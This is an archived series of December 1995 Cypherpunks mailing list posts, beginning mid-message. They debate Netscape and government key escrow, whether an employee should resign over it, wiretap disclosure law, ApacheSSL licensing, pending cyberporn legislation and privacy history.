all homes and hotel rooms would undeniably stop some number of crimes, or
allow the perps to be caught and convicted, but it is too high a price to
pay by orders of magnitude.

(* I call my position "crypto anarchy," for reasons I've explained, but it
is actually the fairly well-respected position of laissez-fair capitalism,
aka anarcho-capitalism, aka freedom. Since it is instantiated on the Net,
perhaps a better name would be "arachno-capitalism," not to be confused
with the "narco-capitalism" practiced, it is said, by the CIA and various
dictators.)


>Nevertheless, I won't think less of Jeff if he doesn't quit.  He appears
>to be fighting what most here believe is the good fight.  Refusing to
>take his ball and go home does not mean, to me, that he lacks
>principles.  Perhaps it means that he thinks he can do more from within.
>
>Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled
>his Usenet access because of his protected speech and then gave it back
>only if he included a disclaimer on his messages.  Fire away, Cypherpunks!!!

Indeed, we all make compromises.

The calls for Jeff to quit Netscape are especially pointless, I think.
First, he can do more for "our" cause than if he quits and his voice is no
longer heard. Second, it's far too early to know how things are going and
whether Netscape will in fact become the "munitions supplier" to the
Surveillance State. Third, the element of hypocrisy. I didn't see a single
one of our AT&T list members resign from AT&T over the Clipper flap.

This is why I'm concerned about the Netscape position, and why I'm probing
for details and explanations, but it is also why I'm trying the best I can
not to be rude or insulting to Jeff Weinstein. If we drive him off the list
with insults and cheap shots, it is quite possible that our views will no
longer have any impact within Netscape (or other companies, for that
matter) and that we'll just be dismissed as a bunch of crazies.

Your mileage may vary.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 17:18:46 PST
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.SUN.3.91.951202032514.18919C-100000@polaris.mindport.net>
Message-ID: <Pine.BSF.3.91.951203201237.6206F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Black Unicorn wrote:

> On Fri, 1 Dec 1995, Brian Davis wrote:
> 
> > On Fri, 1 Dec 1995, Jonathan Zamick wrote:
> 
> > I disagree.  Almost nobody read the fine print on the back of a note you 
> > sign when you buy a car or otherwise take out a loan, but the provisions 
> > are generally enforceable ...  Ignorance is not necessarily an excuse.
> 
> Actually, I was under the impression that adherance contracts like that 

You are correct in saying that onerous provisions of adhesion contracts 
are sometimes not enforced against the party who did not draft the 
contract (the one who had it "forced" upon them).  Again, very fact 
specific.  And that has been my point all along.

As an aside, understand that my comments on this thread relate to my 
semi-educated prediction of how the law will be applied in this context.  
It does not reflect what the law would be if I were King of the forest.


> (the most oft touted example is the ski lift ticket with four paragraphs 
> on the back) are often tossed out when it has to do with liability on 
> that order.  The reason loan agreements are not often thrown out is 
> because courts find an increased expectation that the consumer would be 
> paying attention to the back of loan documents than the back of a ski 
> lift ticket.  I think it will be unlikely that warnings on the box of a 
> given piece of software will suffice.  Large banners in the program 
> itself may meet the threshold.         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Precisely.

> If there is enough interest, I will research the threshold issue.
> 
EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 17:21:40 PST
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951202034905.18919D-100000-100000-100000@polaris.mindport.net>
Message-ID: <Pine.BSF.3.91.951203201900.6206G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Black Unicorn wrote:

> On Fri, 1 Dec 1995, Jeff Weinstein wrote:
> 
> >   See my recent message to this list.  We will be taking an anti-GAK
> > position.
> 
> So you will refuse to implement GAK in future version of netscape then?  
> Or you will merely do lipservice to the GAK policies at the conference?
>

Can you say "shareholders derivative suit"???
 
> I think the distinction is quite key.

Good one! 

> Forgive the pun.
> 
> > 	--Jeff
>  -- 

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 3 Dec 95 18:09:30 PST
To: cypherpunks@toad.com
Subject: Re: Globally legal Netscape
In-Reply-To: <9512032146.AA07279@all.net>
Message-ID: <ay0JFD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) writes:
> 	- The Russian revolution resulted in purges killing hundreds of
> 	thousands of innocent people because of their private, turned
> 	public, views as expoused in their private writings.

Correction: tens of millions were killed (including my great-grandfather).

> 	- The Soviet government took away personal privacy to keep their
> 	stranglehold on their people.

It's interesting to note that the democratic Russian government banned
all unlicenced cryptography this year. (I posted the translation of
Yeltsin's decreee to this list).

 ...
> 	- The Germans under Hitler used personal records to identify and
> 	murder millions of Jews and other peoples.

One conspiciously absent example: the Roosevelt administration used the
census data (supposedly confidential) to ferret out persons of Japanese
descent, who were then sent to concentration camps.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 17:34:36 PST
To: Sten Drescher <dreschs@mpd.tandem.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512011629.KAA28071@galil.austnsc.tandem.com>
Message-ID: <Pine.BSF.3.91.951203202438.6206I-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Sten Drescher wrote:

> Matt Miszewski <crypto@midex.com> said:
> 
> MM> On Thu, 30 Nov 1995, sameer wrote:
> 
> s> Jeff: If Netscape comes out in favor of GAK, will you leave?  (Wait
> s> until February, at least, of course..) You don't have to answer that
> s> to me, or the list, just think about it, and answer it for yourself.
> s> Do you think "anyone else" there would leave, as you say below that
> s> they don't want to go down history, etc...
> 
> MM> While this would go over well in the press if handled right please
> MM> let everyone remember that Jeff is a real person with bills to pay
> MM> and food to put on at least his own table.
> 
> 	I believe that was the point: How many people at Netscape would
> put principled opposition to GAK ahead of expediency?  My guess?  Not
> enough.

I feel slighted.  No one accused me of lacking principles because I 
haven't quit my job with the Justice Department based on its, and the 
Administration's, position.

Then again, maybe you just realize that the market for lawyers, and the 
market for people who can actually do something worthwhile, is very 
different.

Nevertheless, I won't think less of Jeff if he doesn't quit.  He appears 
to be fighting what most here believe is the good fight.  Refusing to 
take his ball and go home does not mean, to me, that he lacks 
principles.  Perhaps it means that he thinks he can do more from within.

Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled 
his Usenet access because of his protected speech and then gave it back 
only if he included a disclaimer on his messages.  Fire away, Cypherpunks!!!

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 95 19:20:55 PST
To: cypherpunks@toad.com
Subject: .SIG disclaimer, clarification
Message-ID: <ace7a27e2d02100417e2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:55 AM 12/4/95, Timothy C. May wrote:
>At 1:30 AM 12/4/95, Brian Davis wrote:

>>Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled
>>his Usenet access because of his protected speech and then gave it back
>>only if he included a disclaimer on his messages.  Fire away, Cypherpunks!!!
>
>Indeed, we all make compromises.

From Jay Campbell's post on this, I more carefully reread Brian's comment.
Without going into this in detail, which there is not enough time or
patience for anyone to read, I'll make a few clarifications.

1. I have not gotten a new ISP anytime recently.

2. I added a disclaimer to my .sig partly to lessen any future
misunderstandings about whether I was speaking for "tcmay@foobar.com" or
speaking for "foobar.com". And partly I added it--as should be clear from
"or the views of my government" part--as an ironic tweak.

3. The case involved a Usenet rant I wrote some time back in which my
"Organization:" field remained set at the default provided by the ISP
(complete with phone number for getting an account, as is common with
Netcom, AOL, Pipeline, etc.). People complained to the owner of
"foobar.com" claiming that his company could be sued, blah blah, for the
views I expressed. (I think this is absurd, of course, for so many reasons
I cannot begin to list them here.)

(I don't believe the nature of my rant is germane to the issues involved.
It was posted to a group filled with similar, or worse, rants, and was not
inappropriate to the subject of the newsgroup. And explaining the post in
context, including preceeding and following posts, and other posts
circulating at the same time, would take far too much time while
accomplishing nothing productive. Was it extreme? Maybe. Events had pissed
me off, so I posted to a rant group. Unfortunately, some on the Usenet want
only their own rants heard.)

4. The owner of foobar.com abruptly turned-off my ability to access his
news machine and sent me an angry note demanding that I cancel my article,
post an apology, and make it clear in future posts that I was not with his
company (by changing the default Organization: field he had automatically
set!). He informed me that failure to promptly indicate my acceptance of
his conditions would result in my account being cancelled.

5. Being that I like the services at foobar.com, and being that it was a
minor matter to meet his conditions, I did so. My access to Usenet was
turned back on. This is what I meant by my statement "we all make
compromises."

6. I am very happy with "got.net," and Jay Campbell, one of the sysops of
got.net, was not the person involved above.

7. This issue presumably came to Brian's attention through the Cyberia
list, where someone (Chris Mohr) had commented on .sig disclaimers in
general and mine in particular. So I outlined the story, in even less
detail than I have here, as an interesting data point on how pressure can
be applied to stifle unpopular opinions.

(Understand that I am opposed to any laws which would force a sysop to keep
a customer he no longer wishes to have. My point is more sociological. In
particular, if a service or ISP gets the "reputation" for cancelling
accounts because of pressures applied, then those who want certain views
suppressed will know they can "roll" the ISP. Netcom, to their credit,
understood this early on and adopted a policy of never cancelling accounts
for the content of things said (spamming, fraud, chain letters, etc. being
well-described exceptions in their "Terms and Conditions") Netcom has
several "despicable" posters who use the system to spread Jew-hating,
white-hating, gay-hating, men-hating, and other such *-hating views, and
even has Holocaust Deniers and the White Aryan Resistance as
account-holders. Netcom refuses to give in to those who want these accounts
cancelled. A lesson for all ISPs, and for remailers, too.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 17:53:27 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: "Got a subpoena?"
In-Reply-To: <m0tLwij-00090FC@pacifier.com>
Message-ID: <Pine.BSF.3.91.951203204048.6206J-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, jim bell wrote:

> >On Thu, 30 Nov 1995, sameer wrote:
> >
> >> > 
> >> > What about a court order to (a) start comprehensive logging, and (b) not
> >> > tell anyone under penalty of ______ .
> >
> >I am unaware of any authority for such an order.
> >> 
> >> 	Aren't court orders part of the public record? I don't quite
> >
> >Yes, but court orders can be sealed pending further order of the court.
> 
> Okay, maybe with your qualifications you can answer this.  It has always
> mystified me why "the authorities" think they can engage in wiretapping
> without informing the person wiretapped that this has occurred, despite the
> fact that there was apparently never any precedent for this practice before
> the "wiretap era."

Because Congress passed the Electronic Communications Privacy Act which 
is codified, as amended, at 18 U.S.C. Section 2510 et seq.  Section 
2511(2)(a)(ii) states in part:  "Notwithstanding any other law, providers 
of wire or electronic communication service ... are authorized to provide 
information, facilities, or technical assistance to persons authorized by 
law to intercept wire, oral, or electronic communications ... if such 
provider ... has been provided with [a court order or a certification by 
an appropriate official that a court order isn't required ...].

> 
> In addition, I would like to be able to figure out a method to allow the
> de-facto disclosure of such activities, and to in fact force the phone
> company to do so, if they are asked to tap my or anyone else's phone.  It
> occurred to me that even if there was a prohibition on explicitly revealing
> that such a tap exists, it should be possible to require the telephone
> company to certify that no tap exists, and to require that this
> certification will be followed by an explicit and immediate de-certification
> message the moment the phone company is unable to maintain such
> certification.  The receipt of such a letter/fax/email will indicate that a
> tap has been placed, despite the fact that it will not say so.

Sorry.  

In subsection B of the the statute I quoted above, it states in 
part:  "No provider of wire or electronic communication service ... shall 
disclose the existence of any interception ... with respect to which the 
person has been furnished a court order or certification ... except as 
may be otherwise required by legal process and then only after prior 
notification to the Attorney General or ....  Any such disclosure shall 
render such person liable for the civil damages provided for in section 
2520.  No cause of action shall lie against in any court against any 
provider ... for providing information ... in accordance with the terms 
of a court order or certification under this chapter." 

Thus providing evidence of that one of the uses of lawyers is to [attempt 
to close loopholes.

EBD

> 
> >EBD
> >
> >Not a lawyer on the Net, although I play one in real life.
> >
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sun, 3 Dec 95 19:03:43 PST
To: cypherpunks@toad.com
Subject: Apachessl (was your mail)
Message-ID: <2B69E5170C1@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Dec 95 at 11:41, Laszlo Vecsey wrote:

: > > Competing with Netscape is obviously something that's easier said than
: > > done.  But we ought to consider the strategic importance of having robust,
: > 
: > 	I hate to repeat myself, but sometimes people don't listen.
: > http://www.c2.org/apachessl/
: 
: I don't see how you can charge for a commercial versions of ApacheSSL. 
: Isn't it protected by the GNU license agreement? Or is the idea that by 
: registering ApacheSSL you still get the software for free but you are 
: required to pay for support.

	Go read the GNU license.  Nothing prevents selling the programs, 
nothing prevents selling modifications of the programs.  The major 
restraint is that you have to provide source.  Now, from what I read of 
the page, that is being done.

	Personally, I would prefer to see the whole thing given away, and if I
had done it, it would be.  But he (or his contractors / employees ) did
the work that went into modifying it, and if he want's to sell that
work he bloody well can.
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Does history recorde any case in which the majority was right?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Sun, 3 Dec 95 21:18:18 PST
To: cypherpunks@toad.com
Subject: Compromise on Cyberporn Legislation
Message-ID: <199512040518.AAA14508@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Just got this.  Maybe there is some common-sense surfacing.

COMPROMISE ON CYBERPORN LEGISLATION
The fears of online service providers and civil liberties advocates that new
federal telecommunications legislation would be too heavy-handed in its
effort to keep "filthy," "lewd" and "indecent" material off of the network
have been mitigated by compromise wording in the proposed legislation.  The
new language, offered by Washington State Republican congressman Rick White,
restricts penalties of fine or imprisonment to persons who transmit material
that is "harmful to children" (such as images of frontal nudity) rather than
a more broadly worded target against making "indecent material" available to
children.  The compromise would give legal protection to online information
and service providers who made good-faith efforts to keep restricted
material away from children.  (New York Times 2 Dec 95 A1)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 3 Dec 95 18:27:24 PST
To: cypherpunks@toad.com
Subject: more examples of privacy invasion as a prelude to oppresion desired
Message-ID: <9512040224.AA11723@all.net>
MIME-Version: 1.0
Content-Type: text


I think it would be a very good idea to collect a great deal more data
in support of the correlation between the reduction in privacy and the
removal of other rights - eventually resulting in bad things -
throughout history.  I would be happy to collect as much data as
possible on this from the cypherpunks (and others) and to post the
information in a more complete form when the examples start to slow
down.

The more facts and citations you can provide, the better it will be
for the purposes of making this point clear, accurate, and hard to
dispute.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 12:24:48 PST
To: cypherpunks@toad.com
Subject: Mr. Bubble II
Message-ID: <199512032025.VAA12833@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May, 12/3/95, 2:22 PM :
 
>My thesis is that both Netscape and Microsoft are in positions at this time
>to either do the right thing (tm) or to help build in the tools for a
>police state, an Orwellian surveillance state.

      Gee, Tim, this is *your* thesis? 

>Netscape, being the dominant browser company, and Microsoft, being the
>dominant OS company, are in special positions to "build in Big Brother."
>I'm not claiming they are, just that they are clearly in a position to make
>it technologically more feasible to make non-GAK illegal. They both need to
>carefully think about the role that's been "given" to them (whether by
>fortune, hard work, or being in the right place at the right time) and do
>what's right.

      And?

>Strong words, perhaps, but the implications of mandatory key escrow are

      Not strong at all, actually.

>quite clear. We debated these points for a long time during the Clipper
>debate, and later when "Software Key Escrow" began to rear its head. I
>won't repeat these arguments against GAK here, but will take this
>opportunity to quote from a new book that actually quotes my words:

      [self-congratulations deleted]

>It is important that such companies as Netscape and Microsoft fully
>understand that crypto policy will largely determine civil liberties in
>this country and other countries for a long time to come. And they must
>understand that they can influence the direction. Bill Gates, after some
>early waffling, seems to now fully understand the implications of GAK and
>has written persuasively against it. Jim Clark does not seem to me have
>thought about it as deeply, or perhaps has views of civil liberties which
>are not at odds with mandatory key escrow, the "open door policy" mentioned
>above.

      Like many entrepreneurs, he is an opportunist in every sense, good
and bad. He has yet to advance -- "graduate" maybe -- beyond that point.
NS's stance re GAK is a golden opportunity for Mr. Bubble either to
graduate or to get popped: either patted on the back by Papa State or
popped in the noggin. When "opportunity" is at stake, he's a shrewd
maneuverer; but when pitting his integrity against federal charges is at
stake, he's still a kid -- he doesn't see the opportunity in it.

>And time is of the essence. Things move very fast. It is no longer the case
>that a law is passed, then companies respond to the new legal regime with
>their own policies and products. Companies, especially in high tech, are
>"partners" from the start, as we saw with the Clipper development (where
>AT&T had known about Clipper for years prior to the first public
>announcement, and was cooperating in the development of it, not to mention
>the other companies such as Mykotronx, VLSI Technology, etc., which were
>involved in secret for years).

      Partner, schmartner: "partners" can be adversarial, and adversarial
relations can become *very* adversarial. Here's the question: is the dog
gonna wag the tail or vice versa? The USG has, as we all know,
demonstrated its infinite capacity to knuckle under in the face of
hardened opposition, whether announced or de facto. NS is in a privileged
position to drag the LEA establishment onto the mat, with the whole of the
American public watching. And it stands to gain from doing so, as do we
all.
      But Mr. Bubble wants to be friends, wants to receive genteel toasts.
      With the kind of money Mr. Bubble stands to make -- whether from NS
or from subsequent ventures -- he should be maybe just a bit tougher. If
he's looking for models, names like Carnegie and and Bismarck come to
mind. (Note that their progeny *still* have money, not 2 years later but
*generations* later.)

>It is only sheer speculation on our part (some of us, at least) that
>negotiations about GAK have been going on with the major software
>companies. Jim Clark, for example, learned what he knows about key escrow
>_someplace_, and it probably wasn't from our list or from articles he'd
>read. I'm betting, but could of course be wrong, that he and other folks at
>Netscape (and I mustn't leave out Microsoft, Sun, SGI, Apple, etc.) have
>been briefed on key escrow and that various negotiations are already
>underway. This would match how things were done with Clipper, and would
>explain Clark's voiced support for the need for GAK.

      On the contrary, it is sheer speculation that negotiations about GAK
*haven't* been going on. This shit doesn't happen by magic.

>I hope Jeff W. and Jim C. can have some _long_ chats. The stakes are too
>high for product decisions to be made without full awareness of the
>implications. The statements from Jim Clark do tend to imply a kind of
>defeatism, and even Jeff's comments seemed laden with qualifications about
>"only if the government requires us to." As Hal Finney noted in his post,
>it's as if the Netscape people are preparing for the inevitable. Maybe it's
>not an indication that GAK is being considered within Netscape, but maybe
>it is. After all, one rarely hears "only if we have to" qualifications on
>things that are truly from out in left field.

      Yes.

>And what Netscape agrees to put in future releases of its browsers or its
>servers could have dramatic effects on the whole climate.

      Yes.


      [social darwinism deleated]

>Should Netscape play ball with the NSA or refuse to cooperate? I'm not
>suggesting that Netscape "break the law." Actually, there are *no* laws at
>present about GAK or about the use of strong crypto within the U.S., and
>most of us want to keep it that way. Thus, Jim Clark and Netscape could
>strongly lobby for keeping things the way they are, and could even say "If
>foreign governments demand GAK, let them build it in themselves--we will
>not produce the software to run a police state."

      NS should implement strong crypto, make it publicly available by FTP
and in a box, and see how the USG responds. The public is on its side.

>And if export laws demand GAK in exported products, Netscape should "do the
>right thing" and have two versions. It may add to their costs a little, but
>it's better than building in the machinery for a GAK law to later be
>passed.

      Yes.

>(Explain something to me. I have never, ever understood why it is a concern
>of the U.S. government that we help build in GAK for foreign governments,
>that we make sure that products intended for export to France or Syria have
>GAK that allows those governments to read the traffic of their citizens.
>And if the concern is that exported versions of software must be readable
>to the _United States_, then this is a non-starter in terms of sales in
>many or even most foreign countries! I'm sure France will welcome with open
>arms a version of Netscape that allows the NSA to read the traffic of
>French citizens. Oh, by the way, what legal jurisdictions will be involved
>in obtaining the escrowed keys of foreigners? The answers are both clear
>and murky, if you catch my drift.)

      Because it isn't interested in freedom, here or anywhere else. It is
interested in a "controlled burn" distribution of stability and
instability. Its willingness to do business with its "enemies" has been
amply demonstrated.
      But your drift is clear, and it is right.

>If the U.S. insists on GAK _within the U.S._, as many of us fear is the
>long-term danger, then all bets are off anyway. But I would hope that
>Netscape does nothing to make it _easier_ to make this the case!

      On the contrary: That's when bets are on. That's when *you* -- and
all of us -- might have to start putting our money and our homes in
Corralitos on the line. That's when Black Unicorn will upload the papers
he claims to have, when I will start wrapping PGP-encrypted mail in
pretty-looking wrappers. That's when we'll have no one but ourselves to
blame. Not even Netscape.

>A viable thing for Netscape to do is to announce forthrightly that it will
>separate the issue of export from what it sells in the U.S., that there
>will be NO GAK included in any U.S.-sold packages. The quest for an "all
>world" version, freely exportable, should not take precedence over the
>civil liberties issues. And I predict that any slight losses in market
>share or slight increases in product cost will be _less_ than the effects
>Netscape will see if their product comes to be associated with "Big Brother
>Inside."

      Yes. But NS should act first, explain second. If NS wants money,
that's how to get it.

>Enough for now.

      Yes.

Hieronymous.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMIHhr3g0mNE55u1AQFI3QH/Y32u8ASp61MPjkaeQJJly7qwQ5BuGNYx
XndZMAPBVXJjOr4Mx5BieouM5GG5WgBc1fMTTRrnAJtSHQO3dgwwBQ==
=WCJS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dima@cuix.pscu.com
Date: Sun, 3 Dec 95 21:27:13 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <TCPSMTP.15.12.3.-11.26.38.2241058206.1303264@cuix.pscu.com>
MIME-Version: 1.0
Content-Type: text/plain


|=========================Hello!=====================================|
| My name is Dmitriy Stepanchuk and I'm student of Kentridge HS.     |
| I have an assignment for school to interview with  an expert.      |
| My subject is Cellular Systems and how are they work.              |
| If you don't mind and are able to answer following question please |
| fill up the blanks, and I will appreciate that.                    |
|======================= Thank you!!! ===============================|

Please put your Name:
.....................................................................
---------------------------------------------------------------------
1)    What is a Cellular System?
.....................................................................
.....................................................................
.....................................................................
---------------------------------------------------------------------
2)    How long is the distance between each cell?
.....................................................................
---------------------------------------------------------------------
3)    What is the most important thing about using cell phones?
.....................................................................
.....................................................................
.....................................................................
.....................................................................
---------------------------------------------------------------------
4)    How do you program cell phones?  Can you program the phone to
      another channel?
.....................................................................
.....................................................................
.....................................................................
.....................................................................
---------------------------------------------------------------------
5)    What is the frequency of the cell phone?
.....................................................................
---------------------------------------------------------------------
6)    Is it possible to get on the same channel for two phones? Why?
.....................................................................
.....................................................................
.....................................................................
---------------------------------------------------------------------
7)    What percentage of the people in US are using cell phones?
.....................................................................
---------------------------------------------------------------------
8)    What is the output power for the portable phones?
.....................................................................
---------------------------------------------------------------------
9)    Is it possible to call toll-free numbers from cell phone?
.....................................................................
---------------------------------------------------------------------
10)   Will I be able to use my cell phone in other countries?
      If not why?
.....................................................................

----- Don't forget to use "message quoting" when you reply ----------
                     +++++++++++++++++++++++++++
               That's it!! Thank you very much!!!!!!!!!!!!!!!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sun, 3 Dec 95 18:28:27 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
Message-ID: <77313.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


TCMay writes to c'punks:

> Well, people discuss what they think is important. Those who don't think
> this topic is important are of course not compelled to participate in the
> debate.

True.
Although calling it a debate is being loose with terms. Rant is more
accurate.

> These two points are what many of us are concerned about. Some may argue
> "Wait until it's illegal, then protest," but I think the Cypherpunks list
> has shown a particular strength in spotting "early warning signals" well
> in advance of actual developments, thus enabling us to get our ducks in
> line and hit the ground running (to mix some metaphors).


Hey, I was a fan of Trial Balloon...
But lets react to reality, not net-rumours.

Nothing to date has indicated that domestic GAK will be manditory,
except, as I noted in the last post, DERD, Freeh, and Grevildinger [sp]

We are failing to get our message accross to the Joe Sixpack's
of the world. We are starting to get get some coverage in
the press (USA Today, NY Times, etc.) but this is a slow
education effort.

Preaching to the choir is pretty pointless.

>>It was quite clearly implied at the September meetings that the
>>  Government expected that vendors would do only one version, GAK'd.
>>  This would allow the LEAs to tromple all over US civil liberties
>>  at will.
> This was my point about having a domestic and an export version.

Don't we agree on this? "tromping" on civil liberties sucks. That is
what I wrote last message.


> Pat, if the policies and technologies surrounding key escrow are not
> relevant to the themes of the Cypherpunks list, I surely don't know what
> is!

The policies and technologies are relevant. hacks to disable
Netscape because people are too lazy to see that they are
already doing multiple version, or that others provide
browsers, is noise. IMHO.

If we want to find about the policies, and given that there
is a huge, public meeting in two days, can't we wait to get some facts?




> People talk about what matters to them, for the most part, and attempts to
> "steer" the list to other topics are best done by example. That is, write
> up a really interesting article on some "relevant" topic and perhaps
> people will discuss it. That seems better than saying a discussion of GAK
> is not relevant.


I have not said any such thing. I have attemped to write up actual,
factual recordings of GAK at NIST.

What I am saying is that bitching about Netscape is a waste of list
bandwidth. If you think Netscape is full of fascists, use
another browser. Or, heaven forbid, write code.


> And the NIST/NSA meeting is coming up in a few days...what better time to
> discuss some issues, and thus possibly trigger some ideas or arguments for
> attendees to make, than now? What's the point of waiting until it's over,
> when all we can do then is complain?

What news is there on this topic? I am a privacy guy. GAK sucks.
So what is news?

Is it news that the Crypto-guys think GAK sucks? As TCMay has written,
check the archives. Lets not cover already covered ground.

Come on, lets either talk about news, action (Ian's, RJC's, Daimen's, ...
hacks) or what we can really do to be effective.

My point, which I clearly failed to make, was that Netscape
has to date, done a pretty good job. The quotes from Jim Clark
indicate that his is clueless. Fine, use another browser.


> I think key escrow, whether of the Clipper variety of the SKE variety, is
> central to the themes of the group.

Netscape bombs are not relevant to what I think is the
charter of Cypherpunks.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 12:54:42 PST
To: cypherpunks@toad.com
Subject: Re: Jim Clark, "Mr. Bubble"
Message-ID: <199512032055.VAA13990@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alex Strasheim:

>  >       1     Make illegal software available by FTP
>  >       2     Explain it's doing so because ITAR is bullshit
>  >       3     Face the gov't down in the press and in the courts 
>  
>  Go for it.  We're behind you 100%.

      If I were worth billions, if I were the sparkle on the high-tech
bubble, if I had a Major hand in engineering crucial protocols, if my
company were so young that it hadn't yet had time to bog down in business
as usual, I think I probably would. That's a lot of Big talk and a lot of
Ifs, ain't it? But that's how it goes: I doubt he -- or anyone else --
would give as much to my LDF as I gave to his (chump change, but more than
I could afford).
      Clark should ask himself what Rabbi Akiva put best: 

      If not me, who?
      If not now, when?

      I do my small part, in my small way; he can do his big part, in his
big way. One thing scares the spooks more than what they oppose:
publicity.

Hieronymous 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMINNr3g0mNE55u1AQFnDgH/UJgFGAW9njKTnm7FgJHMQa1J8VONag0v
5JupJbYMISWYHMZ0KbC8ts6GV9jqD7xYg9dWEHhWbFg3SHJ0CFVt6w==
=Zza/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 95 19:14:02 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: Do the Right Thing
In-Reply-To: <ace76787260210043e19@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951203221051.6107D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Timothy C. May wrote:
[....]
> Is it too early to worry about outlawing of non-GAKked crypto? Hal Abelson 
> has this in the preliminary program for CFP '96, sent out today:
> 
> "Events planned for this year's conference include: 
> 
> - Federalprosecutors square off against civil-liberties lawyers 
> in a Supreme Court test of the "Cryptography Control Act of 
> 1996", which criminalizes non-escrowed encryption." 
[.....] 

Tim knows this, but before some other careless reader sets off a panic, I 
want to make it clear to that this is a MOOT court, in which
participants will PRETEND to test the validity of a HYPOTHETICAL act. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
